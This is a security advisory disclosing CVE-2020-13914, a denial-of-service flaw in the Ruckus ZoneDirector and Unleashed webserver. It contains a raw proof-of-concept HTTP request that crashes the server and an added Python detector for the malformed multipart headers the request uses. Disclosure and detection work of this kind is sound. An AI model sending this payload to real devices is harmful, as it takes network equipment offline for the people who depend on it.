
Webserver denial of service

Aleph Research Advisory

Identifier

Severity

Moderate

Product

- ZoneDirector
- Unleashed

Vulnerable Version

- ZoneDirector: 9.9 and before
- ZoneDirector: 9.10.x
- ZoneDirector: 9.12.x
- ZoneDirector: 9.13.x
- ZoneDirector: 10.0.x
- ZoneDirector: 10.1.x
- ZoneDirector: 10.2.x
- ZoneDirector: 10.3.x
- Unleashed: 200.6 and before
- Unleashed: 200.7

Technical Details

The webs webserver in Ruckus Wireless Unleashed through 200.7.10.102.92 allows a remote attacker to cause a denial of service (segmentation fault of the webserver process) via an unauthenticated crafted HTTP request.

Information about the exploitation of this vulnerability can also be found in our DEFCON 28 talk.

Proof Of Concept

POST / HTTP/1.1
Content-Type: multipart/from-data; boundary=abc
Content-Length: 68

--abc
Content-Disposition:; name="text123"

text default
--abc--
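
As an added example (not part of the advisory or the vendor's code), a Python check that parses a raw HTTP request and flags the two malformations present in the proof of concept above: a multipart boundary declared under a media type other than multipart/form-data, and a body part whose Content-Disposition header carries an empty disposition type. The request bytes are constructed copies of the PoC and of a well-formed equivalent.

```python
import re

# Constructed byte-for-byte copy of the advisory's proof of concept (CRLF endings).
POC_REQUEST = (
    b"POST / HTTP/1.1\r\n"
    b"Content-Type: multipart/from-data; boundary=abc\r\n"
    b"Content-Length: 68\r\n"
    b"\r\n"
    b"--abc\r\n"
    b'Content-Disposition:; name="text123"\r\n'
    b"\r\n"
    b"text default\r\n"
    b"--abc--"
)

# Constructed well-formed request with the same part, for comparison.
BENIGN_REQUEST = (
    b"POST / HTTP/1.1\r\n"
    b"Content-Type: multipart/form-data; boundary=abc\r\n"
    b"Content-Length: 78\r\n"
    b"\r\n"
    b"--abc\r\n"
    b'Content-Disposition: form-data; name="text123"\r\n'
    b"\r\n"
    b"text default\r\n"
    b"--abc--"
)


def parse_headers(block):
    """Parse 'Name: value' lines into a dict keyed by lower-cased name."""
    headers = {}
    for line in block.split(b"\r\n"):
        name, sep, value = line.partition(b":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return headers


def multipart_findings(raw):
    """Return a list of strings describing malformed multipart features in a raw request."""
    findings = []
    head, _, body = raw.partition(b"\r\n\r\n")
    headers = parse_headers(head.split(b"\r\n", 1)[1] if b"\r\n" in head else b"")
    ctype = headers.get(b"content-type", b"")
    m = re.search(rb"boundary=([^;\s]+)", ctype)
    if m is None:
        return findings  # no multipart boundary declared; nothing to inspect
    if not ctype.lower().startswith(b"multipart/form-data"):
        findings.append("boundary declared under media type %r" % ctype.split(b";")[0].decode())
    for part in body.split(b"--" + m.group(1))[1:]:
        if part.startswith(b"--"):
            break  # closing delimiter reached
        part_headers = parse_headers(part.split(b"\r\n\r\n", 1)[0])
        disposition = part_headers.get(b"content-disposition")
        if disposition is not None and not disposition.split(b";", 1)[0].strip():
            findings.append("Content-Disposition with empty disposition type")
    return findings
```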

Timeline

  • 05-Feb-20: Reported to Ruckus Product Security Team
  • 15-Jun-20: Patch
  • 07-Jun-20: CVE-2020-13914 assigned
  • 05-Aug-20: Public disclosure

Credit

  • waveburst of Aleph Research, HCL Software